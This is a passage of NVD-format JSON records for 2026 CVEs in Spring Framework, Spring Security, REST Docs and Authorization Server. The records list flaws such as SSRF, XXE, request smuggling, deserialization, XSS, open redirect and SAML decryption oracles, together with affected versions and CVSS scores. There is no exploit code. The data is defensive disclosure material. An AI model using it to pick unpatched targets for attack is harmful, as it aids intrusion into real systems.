7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:34:51.694460Z","id":"CVE-2026-41851","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41851","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41852","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:37.407","lastModified":"2026-07-17T20:22:51.823","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability in Spring Expression Language (SpEL) evaluation logic allows for arbitrary zero-argument method invocation, even within restricted or read-only contexts, which may allow an attacker to invoke unintended application logic.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.2,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:38:34.698992Z","id":"CVE-2026-41852","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41852","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41853","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:37.523","lastModified":"2026-07-17T20:27:54.777","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring MVC and WebFlux applications are vulnerable to Multipart request smuggling attacks.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:22:10.822220Z","id":"CVE-2026-41853","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-444"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41853","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41854","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:37.647","lastModified":"2026-07-17T20:28:06.567","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Due to incorrect host parsing, applications that rely on UriComponentsBuilder to parse and validate an externally provided URL string may be exposed to a server-side request forgery (SSRF) attack.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":4.2,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:25:04.895135Z","id":"CVE-2026-41854","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41854","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-40988","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:49.527","lastModified":"2026-07-17T20:31:38.020","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An application using spring-security-saml2-service-provider and the REDIRECT binding for SAML 2.0 Login or Logout may be vulnerable to a denial of service by way of an unbounded writer that inflates the compressed SAML payload into memory.\n\nAffected versions:\nSpring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Security","defaultStatus":"unaffected","versions":[{"version":"5.7.0","lessThan":"5.7.24","versionType":"custom","status":"affected"},{"version":"5.8.0","lessThan":"5.8.26","versionType":"custom","status":"affected"},{"version":"6.3.0","lessThan":"6.3.17","versionType":"custom","status":"affected"},{"version":"6.4.0","lessThan":"6.4.17","versionType":"custom","status":"affected"},{"version":"6.5.0","lessThan":"6.5.10.2","versionType":"custom","status":"affected"},{"version":"7.0.0","lessThan":"7.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T18:08:29.853478Z","id":"CVE-2026-40988","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.7.0","versionEndExcluding":"5.7.24","matchCriteriaId":"AB5C2BB6-3DED-4AFA-B2F7-5D0D68F04E1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.8.0","versionEndExcluding":"5.8.26","matchCriteriaId":"55C5A1C3-2071-41EE-A218-B36A531072AC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.3.0","versionEndExcluding":"6.3.17","matchCriteriaId":"A4B7CBD7-3497-4BBB-88EF-B88F9F4C4409"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.4.0","versionEndExcluding":"6.4.17","matchCriteriaId":"B4CF2BF5-E039-4C56-B68E-E98CC82327CE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.5.0","versionEndExcluding":"6.5.10.2","matchCriteriaId":"428C07AD-7D54-4C8B-ACD7-3A3A9EAEE1ED"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.5.1","matchCriteriaId":"C7E64BE1-964C-47F7-AB49-34F0699BF9AF"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-40988","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-40991","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.087","lastModified":"2026-07-17T20:29:31.900","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"When using spring-restdocs-webtestclient or spring-restdocs-restassured to document a remote API accessed over HTTP, an attacker who compromises the API or tricks the user into documenting a malicious API can perform an XXE injection attack when the documentation-generating tests are next executed.\n\nAffected versions:\nSpring REST Docs 4.0.0; 3.0.0 through 3.0.5; 2.0.0.RELEASE through 2.0.8.RELEASE."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring REST Docs","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.0.1","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.5.1","versionType":"custom","status":"affected"},{"version":"2.0.0.RELEASE","lessThan":"2.0.9.RELEASE","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:L","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":1.6,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T13:01:26.403312Z","id":"CVE-2026-40991","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-611"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_rest_docs:*:*:*:*:*:*:*:*","versionStartIncluding":"2.0.0","versionEndExcluding":"2.0.9","matchCriteriaId":"5F69364E-A2BF-487A-A3DA-090D7D529779"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_rest_docs:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.0.5.1","matchCriteriaId":"B5D318C1-D504-4260-84D2-151909F8DF54"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_rest_docs:4.0.0:-:*:*:*:*:*:*","matchCriteriaId":"AE4B0082-FA1B-4925-9DCD-3FBB07725452"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-40991","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-40993","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.197","lastModified":"2026-07-17T20:37:21.870","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An attacker with write permissions to the database table managed by JdbcAssertingPartyMetadataRepository (saml2_asserting_party_metadata) may be able to store malicious serialized payloads in the columns containing the collection of verification or encryption credentials (verification_credentials and encryption_credentials, respectively).\n\nAffected versions:\nSpring Security 7.0.0 through 7.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Security","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:H","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"ADJACENT_NETWORK","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":5.8},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T13:00:59.840309Z","id":"CVE-2026-40993","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.5.1","matchCriteriaId":"C7E64BE1-964C-47F7-AB49-34F0699BF9AF"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-40993","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41003","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.307","lastModified":"2026-07-17T20:37:15.710","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An attacker able to influence values in RelyingPartyRegistration may be able to run arbitrary code on HTML forms generated by Spring Security filters.\n\nAffected versions:\nSpring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Security","defaultStatus":"unaffected","versions":[{"version":"5.7.0","lessThan":"5.7.24","versionType":"custom","status":"affected"},{"version":"5.8.0","lessThan":"5.8.26","versionType":"custom","status":"affected"},{"version":"6.3.0","lessThan":"6.3.17","versionType":"custom","status":"affected"},{"version":"6.4.0","lessThan":"6.4.17","versionType":"custom","status":"affected"},{"version":"6.5.0","lessThan":"6.5.10.2","versionType":"custom","status":"affected"},{"version":"7.0.0","lessThan":"7.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N","baseScore":7.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":4.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T18:07:53.818849Z","id":"CVE-2026-41003","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.7.0","versionEndExcluding":"5.7.24","matchCriteriaId":"AB5C2BB6-3DED-4AFA-B2F7-5D0D68F04E1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.8.0","versionEndExcluding":"5.8.26","matchCriteriaId":"55C5A1C3-2071-41EE-A218-B36A531072AC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.3.0","versionEndExcluding":"6.3.17","matchCriteriaId":"A4B7CBD7-3497-4BBB-88EF-B88F9F4C4409"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.4.0","versionEndExcluding":"6.4.17","matchCriteriaId":"B4CF2BF5-E039-4C56-B68E-E98CC82327CE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.5.0","versionEndExcluding":"6.5.10.2","matchCriteriaId":"428C07AD-7D54-4C8B-ACD7-3A3A9EAEE1ED"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.5.1","matchCriteriaId":"C7E64BE1-964C-47F7-AB49-34F0699BF9AF"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41003","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41008","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.427","lastModified":"2026-07-17T20:37:05.830","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Security Authorization Server's authorization endpoint performs insufficient validation of the request_uri parameter. An attacker can craft a malicious authorization request containing an invalid request_uri and an arbitrary, unvalidated redirect_uri, which can lead to an Open Redirect vulnerability.\n\nAffected versions:\nSpring Security 7.0.0 through 7.0.5.\nSpring Authorization Server 1.5.0 through 1.5.7."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Security","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.5.1","versionType":"custom","status":"affected"}]},{"vendor":"Spring","product":"Spring Authorization Server","defaultStatus":"unaffected","versions":[{"version":"1.5.0","lessThan":"1.5.7.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T18:07:02.878770Z","id":"CVE-2026-41008","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_authorization_server:*:*:*:*:*:*:*:*","versionStartIncluding":"1.5.0","versionEndExcluding":"1.5.7.1","matchCriteriaId":"CDC43C66-4931-47B3-97EC-D266C56F2EA8"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.5.1","matchCriteriaId":"C7E64BE1-964C-47F7-AB49-34F0699BF9AF"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41008","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41694","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.560","lastModified":"2026-07-17T20:36:17.123","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Since Spring Security SAML decrypts SAML Responses as well as elements of SAML LogoutRequests and LogoutResponses without requiring a valid signature, attackers may be able to craft these SAML payloads and use the Service Provider as a decryption oracle.\n\nAffected versions:\nSpring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring 